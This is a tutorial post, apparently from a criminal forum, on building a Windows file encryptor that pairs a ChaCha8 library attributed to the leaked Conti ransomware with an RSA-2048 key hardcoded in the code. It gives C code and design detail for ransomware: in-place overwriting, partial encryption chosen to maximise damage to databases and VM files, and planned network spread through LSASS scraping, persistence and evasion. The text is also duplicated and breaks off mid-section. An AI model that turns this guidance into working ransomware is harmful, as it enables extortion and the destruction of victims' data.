A Practical Tutorial for ChaCha20 + RSA Hybrid File Encryption on Windows: Writing an Encryption/Decryption Engine + KeyGenerator
Author: REMIO | Source: https://xss.pro
Contents:
I: Introduction & Mechanics of the ChaCha20 Library
II: RSA & asymmetric encryption
III: Writing the encryptor engine
IV: Writing the decryptor
V: Conclusion & Future Directions
Github Link to ChaCha Library: https://github.com/RemyQue/ChaCha20-ecrypt-library
Github Link to Full Project: https://github.com/RemyQue/Hybrid-Encryption-ChaCha-RSA
I. Introduction
In this walkthrough I will explore a solution to Windows based hybrid file encryption and walk you through writing a multi threaded hybrid encryption engine & decryptor, namely the ChaCha20 stream cipher, alongside RSA-2048 for key encapsulation. This initial walkthrough will focus primarily on understanding the core encryption algorithms and the implementation of the encryption engine itself. We’ll break down how ChaCha20 operates to encrypt data efficiently and how RSA-2048 is used to securely wrap the encryption keys. In future versions of this tutorial, we will expand the scope by introducing additional features such as on-the-fly key generation, thread pool optimization for improved performance, partial file encryption, and various obfuscation techniques to enhance security. The ultimate goal is to develop a robust and scalable hybrid encryption system specifically tailored for Windows environments….
The ChaCha20 algorithm has gained significant attention in recent years, partly due to its adoption by several well known ransomware variants. This widespread use is understandable given ChaCha20’s efficiency and speed, especially when compared to traditional encryption methods like AES-CBC and AES-GCM. ChaCha20 is a stream cipher closely related to Salsa20, an earlier cipher also designed by Bernstein in 2005. Salsa20 was submitted to the EU’s eSTREAM cryptographic validation process and gained recognition for its security and performance. In 2008, ChaCha was then introduced as a modified version of Salsa20, featuring a new round function that enhances diffusion and improves performance on certain hardware architectures, making it both faster and more secure in practical applications.
Understanding the Mechanics of the ChaCha20 Library
Like its predecessor Salsa20, ChaCha20 essentially operates by generating a pseudorandom keystream that is combined with plaintext data to produce ciphertext, making it highly efficient for encrypting data streams. Both algorithms use a similar internal structure based on quarter-round functions (A round function is a process that mixes and scrambles data to enhance security and create a pseudorandom output, these get repeated x number of times in the cipher, 8 are actually used here) and operate on 512bit blocks, but ChaCha20 introduces a modified round function that increases diffusion (mixes input bits more thoroughly each round, enhancing security). Additionally, ChaCha20 is optimized for better performance on a wider range of hardware, making it a more practical choice in many use cases.
Lets look here at a chacha20 implementation we saw used in the 2022 Conti source leaks, and from then on some other encryptors. This library is well designed and has a modular / reusable design that separates platform detection, portable implementations, optimizations and API layers for maintainability across different systems. We will look here however in the context of Windows. The library also demonstrates a pretty straightforward & performance focused approach of a stream cipher in c so we'll examines how the mathematical operations of the ChaCha algorithm are translated into efficient C code.
The chacha20/library consists of 7 main files:
Core Data Structures
The cipher maintains its entire state in a simple structure containing 16 x 32bit words. This design choice prioritizes speed and simplicity over memory optimization:
This ECRYPT_ctx structure contains a single array called input consisting of 16 elements of 32bit unsigned integers (u32). These 16 words form the complete internal state of the cipher. This layout is actually typical for stream ciphers likeas Salsa20 & ChaCha. The state is usually composed of a combination of constants, the encryption key, a nonce (or Initialisation Vector, or IV, essentially a fixed size input used with a secret key for encryption and decryption) and a block counter.
The comment "could be compressed" hints at a conscious design decision here. Although the internal state might technically be represented more compactly, maybe by reducing word size or storing data more efficiently, the developers deliberately choose not to do this. The primary reason for this is performance. In cryptographic applications like this speed is critical. A flat, fixed size structure like this allows for rapid & predictable access to each part of the state and simplifies the implementation of transformation functions during encryption and decryption. This is a classic design tradeoff. While a compressed structure might save a small amount of memory, it could complicate the code, introduce subtle bugs, and slow down execution due to additional processing. By choosing a straightforward and slightly memory inefficient structure, the developers gained clearer code, faster state updates, and better compatibility with hardware optimized or performance sensitive environments.
ChaCha8 Variant: Use of the Reduced Round variant
This implementation uses only 8 rounds instead of the standard ChaCha20's 20 rounds, as evidenced by the cipher name "ChaCha8" in ecrypt-sync.h and the main encryption loop:
The loop runs 4 times (i starts at 8, decrements by 2 each iteration), with each iteration performing 8 quarter-rounds (4 column + 4 diagonal), totaling 32 quarter rounds or 8 full rounds. This is a deliberate performance optimization - ChaCha8 runs 2.5x faster than ChaCha20 while still providing substantial security for ransomware applications where speed is prioritized over maximum cryptographic strength.
The Quarter-round Function
The core cryptographic operation is implemented as a macro rather than a function to eliminate call overhead:
Each line here performs a specific mixing operation:
The rotation amounts (16, 12, 8, 7) were carefully chosen by the ChaCha designers to provide optimal diffusion of bits across the state.
Primitive Operation Macros
The library abstracts basic operations into macros for portability and potential optimization:
State Layout and Initialization
The 16 word state follows ChaCha's standard layout, designed for efficient mixing:
Words 0-3: Fixed constants that prevent related-key attacks
Words 4-11: The encryption key (256-bit or 128-bit repeated)
Words 12-13: Block counter that increments for each 64-byte block
Words 14-15: Nonce/IV that should be unique for each message
Key Setup
The key setup function handles both 128bit and 256 bit keys, adapting the state initialization accordingly to maintain compatibility with different operational modes. For 256bit key the function directly loads the full key into the state words reserved for key material, ensuring that the entire secret is used as intended.
In the case of a 128 bit key, the function duplicates the key to fill the key words, a common practice in chacha variants to maintain consistent state size without weakening security drastically. Also the setup process carefully accounts for endiannes by converting input bytes into the correct 32-bit word format expected by the algorithm. This ensures the cipher behaves consistently across different CPU architectures (little endian vs. big endian), avoiding subtle bugs or security flaws caused by incorrect byte ordering. Overall, the key setup is designed to be robust, flexible, and portable, setting a strong foundation for the subsequent encryption rounds.
The U8TO32_LITTLE macro converts 4 bytes from the key array into a 32 bit word in little endian format, ensuring consistent behaviour across different CPU architectures. To account for 128 bit keys the same key material is used twice to fill the 256 bit key space.
So… Why this library?
Overall this library employs a nice range of deliberate design choices to maximize speed and efficiency. By opting for ChaCha8 instead of ChaCha20, it achieves roughly a 2.5x performance boost while maintaining sufficient security for its intended use. The use of macros instead of function calls removes call overhead, and defining local variables (x0–x15) allows the compiler to allocate them directly to CPU registers, speeding up access. Loop unrolling minimizes branching and control overhead, while omitting error checking and bounds validation reduces code size and runtime delays. Direct memory operations eliminate dependencies on external libraries, streamlining integration and minimizing latency.
The Conti ChaCha8 library exemplifies how reduced-round symmetric encryption can be effectively leveraged in encryptors to optimize throughput without sacrificing necessary security. Its modular architecture, focus on speed through ChaCha8, minimal error handling, and avoidance of standard libraries make it particularly suited for high-throughput, multithreaded encryption tasks. Overall, this implementation reflects a mature, performance-driven approach to cryptographic engine design commonly found in advanced malware. So great, we can start encrypting files…?
Not quite, before diving into the process of encrypting files using this library, it’s essential to first address how the encryption key itself is secured. Symmetric encryption algorithms like ChaCha8 require both the sender and receiver to have access to the same secret key, which presents a challenge for our safe key distribution. To solve this, we first need to select and implement an asymmetric encryption method like as RSA, to encrypt and protect the ChaCha8 key. This hybrid approach ensures that even if the communication channel is monitored, the symmetric key remains secure. In the next section, we’ll explore how RSA can be used effectively to encrypt the ChaCha8 key, enabling a secure and efficient file encryption pipeline.
II. RSA Integration for Key Encapsulation
While ChaCha8 handles the actual file encryption, with exceptional speed at that, we need some sort of method of securing this key before its ever saved or sent off. The implementation we will be working with shall use RSA2048 for key encapsulation: a hybrid approach that combines the performance benefits of symmetric encryption with the security advantages of asymmetric cryptography. RSA (Rivest-shamir-adleman) is a widely used public key cryptosystem that enables secure key exchange without requiring prior shared secrets between parties.
So Rather than encrypting file content directly with RSA (which would be extremely slow for large or many files), the system generates random ChaCha8 keys and IVs for each file, then encrypts these small key materials using the RSA public key. This approach leverages RSA's strength in secure key exchange while avoiding its performance limitations for bulk data encryption. The 2048bit RSA key provides substantial security equivalent to approximately 112 bits of symmetric security making it computationally infeasible for attackers to recover the ChaCha8 keys even if they possess the encrypted files. Each file gets its own unique ChaCha8 key/IV pair, ensuring that compromising one file's encryption doesn't affect others. We shall explore this methodology later on when we look at encryptor design in more detail.
For simplicity and demonstration purposes I've used Windows' built in CryptoAPI rather than implementing RSA from scratch. Anyhow, the Windows CryptoAPI provides a well tested RSA functionality that integrates nicely with the system's cryptographic system so it shall do for our project. I have also not obfuscated the obfuscated RSA key, this is simply for demonstration purposes and simplicity and we will come to obfuscating later on.
That said, while RSA is still fine in my opinion for secure key exchange. Modern encryption schemes however often rely on more efficient algorithms like ChaCha20-Poly1305, ECDSA, X25519 or whatever. Anyhow, the key point is that the standard approach today is hybrid encryption: asymmetric algorithms such as RSA or elliptic curve methods like ECDH are used to securely handle the symmetric key, while a fast symmetric cipher like ChaCha20-Poly1305 encrypt the actual data. Data is protected using a lightweight symmetric cipher, while the key is safeguarded by a robust asymmetric technique.
Key Generation and Encapsulation Process
The RSA encapsulation process follows a straightforward workflow. For each target file, the system generates a fresh 32-byte ChaCha8 key and 12-byte initialization vector using the Windows cryptographically secure random number generator. These key materials are then concatenated and encrypted using the RSA public key:
To wrap up this section, we use Win CryptoAPI for a simple yet effective solution by abstracting complex cryptographic details such as padding schemes like PKCS#1 (I constantly have headaches with padding schemes for reasons unknown). This allows our walk through focus on integrating ChaCha8 and file processing without getting bogged down in RSA intricacies. The hardcoded public key approach further simplifies deployment by removing the need for key distribution.
RSA Key generator:
III. Writing the Hybrid Crypto Logic
Now that we’ve established our ChaCha8 library and RSA key encapsulation system, let’s examine how we can use these components together in a complete file encryption implementation. The hybrid approach we’ll take demonstrates how to efficiently process multiple files using a multi threaded architecture while maintaining decently strong cryptographic security.
The core challenge in designing an effective file encryption system lies in balancing cryptographic strength, performance throughput and system resource utilization. Our implementation addresses this through a producer/consumer threading model combined with adaptive encryption strategies that optimize processing based on file characteristics. The system maintains separate encryption contexts per file while leveraging shared cryptographic providers to minimize th e initialization overhead.
Core Data Structures and Memory Management
The implementation relies on several key structures that organize file information, encryption context and work distribution. These structures are designed to minimize memory allocations and enable efficient data flow between threads.
The FILE_HEADER structure serves as the cryptographic metadata container appended to each encrypted file. It stores the RSA encrypted ChaCha8 key material, encryption mode indicators for the decryption process and the original file size required for proper file reconstruction. The ENCRYPTED_KEY_SIZE of 524 bytes accommodates the RSA2048 encrypted output with PKCS#1 padding ensuring sufficient space for the 44byte key + IV combination after RSA encryption.
The FILE_INFO structure maintains the complete encryption context for a single file operation. It contains both plaintext ChaCha8 materials (which are zeroed after use) and the RSA encrypted key data that persists in the file header. The embedded chacha_ctx maintains the algorithm’s internal state, allowing for streaming encryption operations across multiple buffer chunks without reinitializing the cipher context.
Multithreading
To maximize encryption throughput across modern multiple cores, the implementation employs a threadsafe producer/consumer pattern. This architecture decouples file discovery from encryption processing, allowing the most optimal resource utilization.
The work queue uses Windows synchronization primitives to coordinate between the main discovery thread and multiple worker threads while the critical section protects queue modifications while the semaphore provides efficient thread blocking and signalling. A fixed size queue (1000 items) prevents unbounded memory growth during large directory traversals while providing sufficient buffering for sustained throughput.
The worker threads operate independently with dedicated 5MB buffers (allocated via VirtualAlloc) for optimal memory alignment and reduced fragmentation. Each thread maintains its own buffer to eliminate contention and enable true parallel processing of multiple files simultaneously.
Adaptive Encryption Strategies Based on File Characteristics
Rather than applying uniform encryption to all files, the system employs intelligent strategies based on file type and size characteristics. This approach optimizes for both processing speed and operational impact while maintaining cryptographic security.
The adaptive strategy recognizes that different file types have varying sensitivity to partial corruption. Database files receive complete encryption since any corruption typically renders them entirely unusable, maximizing operational impact. Virtual machine files use targeted partial encryption at 20% coverage, which corrupts critical metadata while maintaining enough structure to suggest recoverability. For general files, the size-based approach balances processing time with effectiveness. Files under 1MB are fully encrypted with minimal performance impact, while files between 1-5MB receive header-only encryption that corrupts file format signatures and metadata. Large files over 5MB use 50% partial encryption distributed across the file to ensure sufficient corruption while maintaining reasonable processing times.
ChaCha8 Integration and Cryptographic Key Management
The integration between RSA key protection and ChaCha8 file encryption demonstrates proper hybrid cryptography implementation. Each file receives cryptographically independent key material while leveraging shared RSA infrastructure for key protection.
The key generation process uses Windows CryptoAPI's CryptGenRandom function, which provides cryptographically secure pseudorandom number generation (PRNG) suitable for key material. Each file receives a fresh 32byte ChaCha8 key and 8-byte IV, ensuring cryptographic independence between files. The ChaCha8 context initialization prepares the cipher's internal state for subsequent encryption operations.
The RSA encryption combines the 32-byte key and 8byte IV into a 40byte payload, which is then encrypted using the public key with PKCS#1 v1.5 padding. This results in a 256-byte ciphertext for RSA2048, providing both confidentiality and integrity for the symmetric key material. The padding scheme ensures semantic security, making identical key+IV combinations produce different RSA ciphertexts.
Streaming File Processing and Header Management
The system processes files using streaming operations to maintain constant memory usage regardless of file size. This approach enables encryption of arbitrarily large files while preserving system responsiveness and memory efficiency.
The header-at-end approach allows the encryption process to work with file contents first, then append the decryption metadata. This design simplifies the encryption logic since it doesn’t require shifting existing file data to accommodate a header at the beginning. The header contains all information necessary for decryption: the RSA-encrypted key material, encryption mode indicators, percentage of data encrypted, and original file size for proper restoration.
The WriteFullData function ensures atomic write operations by handling partial writes that can occur with large buffers or under system load. It continues writing until all data is committed to storage, preventing corruption from incomplete writes that could render files unrecoverable even with the correct decryption key.
Performance Optimizations and Buffer Management
Several design decisions optimize encryption throughput while maintaining cryptographic security. The implementation prioritizes streaming operations, buffer reuse, and minimal system call overhead to achieve maximum performance.
The streaming approach processes files in 5MB chunks. Each worker thread maintains a dedicated buffer allocated with VirtualAlloc for optimal memory alignment and reduced fragmentation. Inplace encryption minimizes memory copies by using the same buffer for both input and output data, taking advantage of chacha8 ability to encrypt data in place without requiring separate source and destination buffers. File pointer manipulation using SetFilePointerEx with negative offsets enables the read encrypt write back pattern necessary for the in place file modification. This approach avoids creating temporary files while ensuring the original file content is properly overwritten with encrypted data, crucial for encryptor usecase. The LARGE_INTEGER file positioning supports files larger than 4GB, ensuring compatibility with modern file sizes.
Cryptographic Hygiene
The implementation incorporates several design elements that ensure good cryptographic strength while preventing common vulnerabilities. These measures provide defense against both cryptographic attacks & exploits. Proper resource management ensures that file handles are closed before renaming operations, preventing sharing violations that could leave files in inconsistent states and we gracefully handle locked files by skipping them rather than failing, maintaining operational continuity in multi user environment where files may be actively in use. Any memory containing sensitive key material should be securely cleared after use using SecureZeroMemory or similar functions to prevent key recovery from mrmory dumps or swap files, though this detail is omitted from the shown code for brevity.
Excellent, now lets write the decryptor…
IV. Writing the Hybrid Decryption Logic
The decryption process essentially reverses our encryption workflow, but requires careful attention to key recovery, file integrity validation and proper restoration of original file structures to ensure we dont fuck our data. Our decryptor will safely reconstruct files from their encrypted state while maintaining the same multithreaded architecture for optimal performance.
The core challenge in decryption lies in securely recovering the ChaCha8 key material from RSA encrypted headers and ensuring complete file restoration without data loss. Our implementation addresses this through systematic header parsing, robust key decryption, and adaptive processing strategies that mirror the original encryption modes.
Key Recovery & RSA Decryption
The decryption process begins with importing the RSA private key and establishing the cryptographic context. Unlike the encryptor which generates keys the decryptor must locate and import existing private key material to recover the symmetric encryption keys.
The key import process requires the RSA private key file generated during encryption. This file contains the PRIVATEKEYBLOB exported by the encryptor, allowing the decryptor to recover the original RSA key pair needed for symmetric key decryption.
Header Parsing and Metadata Recovery
Each encrypted file contains a FILE_HEADER structure appended at the end, containing all metadata necessary for proper decryption. The decryptor must carefully parse this header to recover encryption parameters and the RSA-encrypted ChaCha8 key material.
The header reading process removes the metadata from the file during parsing, immediately restoring the file to its encrypted-content-only state. This approach ensures that the decryption process works with clean file boundaries matching the original encrypted data size.
ChaCha8 Key Recovery and Context Initialization
Once the header is parsed, the RSA-encrypted key material must be decrypted to recover the original ChaCha8 key and IV. This process requires careful handling of the PKCS#1 padding and proper initialization of the ChaCha8 context.
The key recovery process uses the same ChaCha8 context initialization as encryption. Since ChaCha8 is a stream cipher, the same keystream used for encryption will perfectly reverse the process when applied to the encrypted data, restoring the original plaintext.
Adaptive Decryption Based on Encryption Mode
The decryptor must support the same adaptive strategies used during encryption, processing files according to their stored encryption mode and parameters. This ensures proper restoration regardless of which encryption strategy was originally applied.
Mode based processing ensures that files encrypted with different strategies are properly restored. DataPercent field from the header provides the exact parameters needed to reconstruct partially encrypted files with the correct block sizes and step intervals.
Streaming Decryption and File Restoration
The decryption process mirrors the encryption streaming approach, processing files in chunks while maintaining constant memory usage with key difference is that ChaCha8's symmetric nature allows the same encryption function to serve as decryption.
Streaming decryption maintains the same in place processing approach as encryption, minimizing memory overhead and enabling efficient processing of large files. The originalFileSize from the header ensures that decryption processes exactly the correct amount of data, preventing over-processing that could corrupt the restored file.
File Restoration and Extension Management
Once decryption is complete, the system must restore the original filename by removing the encryption extension. This process ensures that decrypted files return to their original state and can be properly accessed by applications.
The filename restoration includes retry logic to handle temporary file system locks or sharing violations that might prevent immediate renaming. This approach ensures smooth operation in multi user environments where files might be briefly locked by EDRs or other system processes. The decryptor includes comprehensive error handling to manage various failure scenarios gracefully. Invalid headers, corrupted key material, or incomplete files are detected and handled without crashing the decryption process. Files that cannot be decrypted due to corruption, missing headers, or invalid keys are skipped rather than causing the entire process to fail. This ensures that partial recovery is possible even when some files in a dataset are damaged. The multi-threaded architecture maintains processing continuity, allowing successful decryptions to proceed while problematic files are handled separately. The implementation also includes proper cleanup of cryptographic resources and file handles, ensuring that system resources are released even when errors occur during processing. This approach maintains system stability and prevents resource leaks that could impact system performance during large-scale decryption operations. And there we have it. Our Basic Encryptor / Decryptor and key generator.
V. Conclusion and Future Directions
So there we have it, our project now combines a reduced-round ChaCha8 stream cipher for high-speed symmetric encryption with RSA-2048 for secure per-file key encapsulation. The hybrid model we’ve implemented is designed to be simple, efficient, and highly modular — separating the encryption logic, key management, threading system, and file handling into clean, swappable components. The result is a fast, multithreaded engine capable of encrypting large volumes of files with minimal resource overhead.
Nice.
At this stage our implementation is primarily educational. A clear, working demonstration of modern crypto principles in action. But there’s plenty of room to expand. Planned improvements include full drive enumeration and smarter file discovery techniques using system APIs and registry lookups, enabling deeper reach across local and removable volumes. On the cryptographic side, the current hardcoded RSA key can be replaced with dynamic key generation and possibly elliptic curve based methods like X25519 for faster, smaller key exchange. We can also looking into refining the threadpool architecture to support better scaling on multi core systems. Integrating a scanning module would allow enumeration of SMB shares, remote drives, and nearby hosts pushing the system beyond the local machine. Combined with LSASS memory scraping or token impersonation, it could automatically propagate and encrypt across an entire subnet. Stealth enhancements are also on the table: userland anti-hooking, basic anti-debugging, simple persistence via registry or scheduled tasks, and eventually code obfuscation to make reverse engineering harder. Realistically theres a LOT to be added to make this even remotely close to a functional encryptor for real use cases, however thee cryptographic foundations and engine is solid for demonstrative purposes.
Thanks for reading.
- Remy
”Take more chances, dance more dances…”
Author: REMIO | Source: https://xss.pro
Contents:
I: Introduction & Mechanics of the ChaCha20 Library
II: RSA & asymmetric encryption
III: Writing the encryptor engine
IV: Writing the decryptor
V: Conclusion & Future Directions
Github Link to ChaCha Library: https://github.com/RemyQue/ChaCha20-ecrypt-library
Github Link to Full Project: https://github.com/RemyQue/Hybrid-Encryption-ChaCha-RSA
I. Introduction
In this walkthrough I will explore a solution to Windows based hybrid file encryption and walk you through writing a multi threaded hybrid encryption engine & decryptor, namely the ChaCha20 stream cipher, alongside RSA-2048 for key encapsulation. This initial walkthrough will focus primarily on understanding the core encryption algorithms and the implementation of the encryption engine itself. We’ll break down how ChaCha20 operates to encrypt data efficiently and how RSA-2048 is used to securely wrap the encryption keys. In future versions of this tutorial, we will expand the scope by introducing additional features such as on-the-fly key generation, thread pool optimization for improved performance, partial file encryption, and various obfuscation techniques to enhance security. The ultimate goal is to develop a robust and scalable hybrid encryption system specifically tailored for Windows environments….
The ChaCha20 algorithm has gained significant attention in recent years, partly due to its adoption by several well known ransomware variants. This widespread use is understandable given ChaCha20’s efficiency and speed, especially when compared to traditional encryption methods like AES-CBC and AES-GCM. ChaCha20 is a stream cipher closely related to Salsa20, an earlier cipher also designed by Bernstein in 2005. Salsa20 was submitted to the EU’s eSTREAM cryptographic validation process and gained recognition for its security and performance. In 2008, ChaCha was then introduced as a modified version of Salsa20, featuring a new round function that enhances diffusion and improves performance on certain hardware architectures, making it both faster and more secure in practical applications.
Understanding the Mechanics of the ChaCha20 Library
Like its predecessor Salsa20, ChaCha20 essentially operates by generating a pseudorandom keystream that is combined with plaintext data to produce ciphertext, making it highly efficient for encrypting data streams. Both algorithms use a similar internal structure based on quarter-round functions (A round function is a process that mixes and scrambles data to enhance security and create a pseudorandom output, these get repeated x number of times in the cipher, 8 are actually used here) and operate on 512bit blocks, but ChaCha20 introduces a modified round function that increases diffusion (mixes input bits more thoroughly each round, enhancing security). Additionally, ChaCha20 is optimized for better performance on a wider range of hardware, making it a more practical choice in many use cases.
Lets look here at a chacha20 implementation we saw used in the 2022 Conti source leaks, and from then on some other encryptors. This library is well designed and has a modular / reusable design that separates platform detection, portable implementations, optimizations and API layers for maintainability across different systems. We will look here however in the context of Windows. The library also demonstrates a pretty straightforward & performance focused approach of a stream cipher in c so we'll examines how the mathematical operations of the ChaCha algorithm are translated into efficient C code.
The chacha20/library consists of 7 main files:
- ecrypt-config.h: Platform detection and type definitions
- ecrypt-portable.h: Portable macros for crypto operations
- ecrypt-machine.h: Platform-specific optimizations
- ecrypt-sync.h: API interface definitions
- chacha.c: Core ChaCha algorithm implementation
- chacha.h: Simplified public interface
- chacha_adapter.c: Bridge between ECRYPT and simplified APIs
Core Data Structures
The cipher maintains its entire state in a simple structure containing 16 x 32bit words. This design choice prioritizes speed and simplicity over memory optimization:
C:
typedef struct {
u32 input[16]; /* could be compressed */
} ECRYPT_ctx;
This ECRYPT_ctx structure contains a single array called input, consisting of 16 32-bit unsigned integers (u32). These 16 words form the complete internal state of the cipher. This layout is typical for stream ciphers such as Salsa20 and ChaCha. The state is composed of constants, the encryption key, a nonce (or initialization vector, IV: a fixed-size input used together with the secret key for encryption and decryption) and a block counter.
The comment "could be compressed" hints at a conscious design decision. Although the internal state could technically be represented more compactly, for example by not storing the fixed constants or by packing data more tightly, the developers deliberately chose not to do this. The primary reason is performance: in cryptographic code like this, speed is critical. A flat, fixed-size structure allows rapid and predictable access to each part of the state and simplifies the transformation functions used during encryption and decryption. This is a classic design tradeoff. A compressed structure might save a small amount of memory, but it could complicate the code, introduce subtle bugs, and slow down execution due to additional processing. By choosing a straightforward and slightly memory-inefficient structure, the developers gained clearer code, faster state updates, and better compatibility with hardware-optimized or performance-sensitive environments.
ChaCha8 Variant: Use of the Reduced Round variant
This implementation uses only 8 rounds instead of the standard ChaCha20's 20 rounds, as evidenced by the cipher name "ChaCha8" in ecrypt-sync.h and the main encryption loop:
C:
for (i = 8; i > 0; i -= 2) {
// Column rounds
QUARTERROUND(x0, x4, x8, x12)
QUARTERROUND(x1, x5, x9, x13)
QUARTERROUND(x2, x6, x10, x14)
QUARTERROUND(x3, x7, x11, x15)
// Diagonal rounds
QUARTERROUND(x0, x5, x10, x15)
QUARTERROUND(x1, x6, x11, x12)
QUARTERROUND(x2, x7, x8, x13)
QUARTERROUND(x3, x4, x9, x14)
}
The loop runs 4 times (i starts at 8, decrements by 2 each iteration), with each iteration performing 8 quarter-rounds (4 column + 4 diagonal), totaling 32 quarter rounds or 8 full rounds. This is a deliberate performance optimization - ChaCha8 runs 2.5x faster than ChaCha20 while still providing substantial security for ransomware applications where speed is prioritized over maximum cryptographic strength.
The Quarter-round Function
The core cryptographic operation is implemented as a macro rather than a function to eliminate call overhead:
C:
#define QUARTERROUND(a,b,c,d) \
a = PLUS(a,b); d = ROTATE(XOR(d,a),16); \
c = PLUS(c,d); b = ROTATE(XOR(b,c),12); \
a = PLUS(a,b); d = ROTATE(XOR(d,a), 8); \
c = PLUS(c,d); b = ROTATE(XOR(b,c), 7);
Each line here performs a specific mixing operation:
- Line 1: Add b into a, XOR the new a into d, then rotate d left by 16 bits
- Line 2: Add the new d into c, XOR the new c into b, then rotate b left by 12 bits
- Line 3: Repeat the pattern of line 1 with an 8-bit rotation
- Line 4: Repeat the pattern of line 2 with a 7-bit rotation
The rotation amounts (16, 12, 8, 7) were carefully chosen by the ChaCha designers to provide optimal diffusion of bits across the state.
Primitive Operation Macros
The library abstracts basic operations into macros for portability and potential optimization:
C:
#define ROTATE(v,c) (ROTL32(v,c))
#define XOR(v,w) ((v) ^ (w))
#define PLUS(v,w) (U32V((v) + (w)))
#define PLUSONE(v) (PLUS((v),1))
- ROTATE uses the portable rotation macro which may be optimized for specific CPUs
- XOR is straightforward bitwise exclusive OR
- PLUS ensures 32-bit wraparound arithmetic using the U32V macro
- PLUSONE is a convenience macro for incrementing counters
State Layout and Initialization
The 16 word state follows ChaCha's standard layout, designed for efficient mixing:
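Words 0-3: Fixed constants (the ASCII string "expand 32-byte k" or "expand 16-byte k") that break symmetry in the state and limit how much of the input an attacker controls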
Words 4-11: The encryption key (256-bit or 128-bit repeated)
Words 12-13: Block counter that increments for each 64-byte block
Words 14-15: Nonce/IV that should be unique for each message
Key Setup
The key setup function handles both 128-bit and 256-bit keys, adapting the state initialization accordingly. For a 256-bit key the function loads the full key directly into the eight state words reserved for key material, so the entire secret is used as intended.
For a 128-bit key, the function duplicates the key to fill all eight key words. This keeps the state size consistent, although the effective key strength remains 128 bits. The setup also accounts for endianness by converting input bytes into the little-endian 32-bit word format the algorithm expects. This ensures the cipher behaves consistently across CPU architectures (little-endian vs. big-endian) and avoids subtle bugs caused by incorrect byte ordering.
C:
void ECRYPT_keysetup(ECRYPT_ctx* x, const u8* k, u32 kbits, u32 ivbits)
{
const char* constants;
// Load first half of key (always present)
x->input[4] = U8TO32_LITTLE(k + 0);
x->input[5] = U8TO32_LITTLE(k + 4);
x->input[6] = U8TO32_LITTLE(k + 8);
x->input[7] = U8TO32_LITTLE(k + 12);
if (kbits == 256) {
k += 16; // Advance to second half of 256-bit key
constants = sigma; // "expand 32-byte k"
} else {
constants = tau; // "expand 16-byte k" for 128-bit keys
}
// Load second half (or repeat first half for 128-bit keys)
x->input[8] = U8TO32_LITTLE(k + 0);
x->input[9] = U8TO32_LITTLE(k + 4);
x->input[10] = U8TO32_LITTLE(k + 8);
x->input[11] = U8TO32_LITTLE(k + 12);
// Set the magic constants
x->input[0] = U8TO32_LITTLE(constants + 0);
x->input[1] = U8TO32_LITTLE(constants + 4);
x->input[2] = U8TO32_LITTLE(constants + 8);
x->input[3] = U8TO32_LITTLE(constants + 12);
}
The U8TO32_LITTLE macro converts 4 bytes from the key array into a 32 bit word in little endian format, ensuring consistent behaviour across different CPU architectures. To account for 128 bit keys the same key material is used twice to fill the 256 bit key space.
So… Why this library?
Overall this library employs a nice range of deliberate design choices to maximize speed and efficiency. By opting for ChaCha8 instead of ChaCha20, it achieves roughly a 2.5x performance boost while maintaining sufficient security for its intended use. The use of macros instead of function calls removes call overhead, and defining local variables (x0–x15) allows the compiler to allocate them directly to CPU registers, speeding up access. Loop unrolling minimizes branching and control overhead, while omitting error checking and bounds validation reduces code size and runtime delays. Direct memory operations eliminate dependencies on external libraries, streamlining integration and minimizing latency.
The Conti ChaCha8 library exemplifies how reduced-round symmetric encryption can be effectively leveraged in encryptors to optimize throughput without sacrificing necessary security. Its modular architecture, focus on speed through ChaCha8, minimal error handling, and avoidance of standard libraries make it particularly suited for high-throughput, multithreaded encryption tasks. Overall, this implementation reflects a mature, performance-driven approach to cryptographic engine design commonly found in advanced malware. So great, we can start encrypting files…?
Not quite, before diving into the process of encrypting files using this library, it’s essential to first address how the encryption key itself is secured. Symmetric encryption algorithms like ChaCha8 require both the sender and receiver to have access to the same secret key, which presents a challenge for our safe key distribution. To solve this, we first need to select and implement an asymmetric encryption method like as RSA, to encrypt and protect the ChaCha8 key. This hybrid approach ensures that even if the communication channel is monitored, the symmetric key remains secure. In the next section, we’ll explore how RSA can be used effectively to encrypt the ChaCha8 key, enabling a secure and efficient file encryption pipeline.
II. RSA Integration for Key Encapsulation
While ChaCha8 handles the actual file encryption, with exceptional speed at that, we need some sort of method of securing this key before its ever saved or sent off. The implementation we will be working with shall use RSA2048 for key encapsulation: a hybrid approach that combines the performance benefits of symmetric encryption with the security advantages of asymmetric cryptography. RSA (Rivest-shamir-adleman) is a widely used public key cryptosystem that enables secure key exchange without requiring prior shared secrets between parties.
So Rather than encrypting file content directly with RSA (which would be extremely slow for large or many files), the system generates random ChaCha8 keys and IVs for each file, then encrypts these small key materials using the RSA public key. This approach leverages RSA's strength in secure key exchange while avoiding its performance limitations for bulk data encryption. The 2048bit RSA key provides substantial security equivalent to approximately 112 bits of symmetric security making it computationally infeasible for attackers to recover the ChaCha8 keys even if they possess the encrypted files. Each file gets its own unique ChaCha8 key/IV pair, ensuring that compromising one file's encryption doesn't affect others. We shall explore this methodology later on when we look at encryptor design in more detail.
For simplicity and demonstration purposes I've used Windows' built in CryptoAPI rather than implementing RSA from scratch. Anyhow, the Windows CryptoAPI provides a well tested RSA functionality that integrates nicely with the system's cryptographic system so it shall do for our project. I have also not obfuscated the obfuscated RSA key, this is simply for demonstration purposes and simplicity and we will come to obfuscating later on.
That said, while RSA is still fine in my opinion for secure key exchange. Modern encryption schemes however often rely on more efficient algorithms like ChaCha20-Poly1305, ECDSA, X25519 or whatever. Anyhow, the key point is that the standard approach today is hybrid encryption: asymmetric algorithms such as RSA or elliptic curve methods like ECDH are used to securely handle the symmetric key, while a fast symmetric cipher like ChaCha20-Poly1305 encrypt the actual data. Data is protected using a lightweight symmetric cipher, while the key is safeguarded by a robust asymmetric technique.
Код:
// Hardcoded RSA public key blob (2048-bit)
const BYTE g_hardcodedPublicKey[] = {
0x06, 0x02, 0x00, 0x00, 0x00, 0xA4, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31,
// … (remainder of 2048-bit public key)
};
BOOL InitializeCrypto(HCRYPTPROV* cryptoProvider, HCRYPTKEY* publicKey) {
// Acquire cryptographic context
if (!CryptAcquireContextW(cryptoProvider, NULL, MS_ENHANCED_PROV,
PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
return FALSE;
}
// Import the hardcoded public key
if (!CryptImportKey(*cryptoProvider, g_hardcodedPublicKey,
g_hardcodedPublicKeySize, 0, 0, publicKey)) {
CryptReleaseContext(*cryptoProvider, 0);
return FALSE;
}
return TRUE;
}
Key Generation and Encapsulation Process
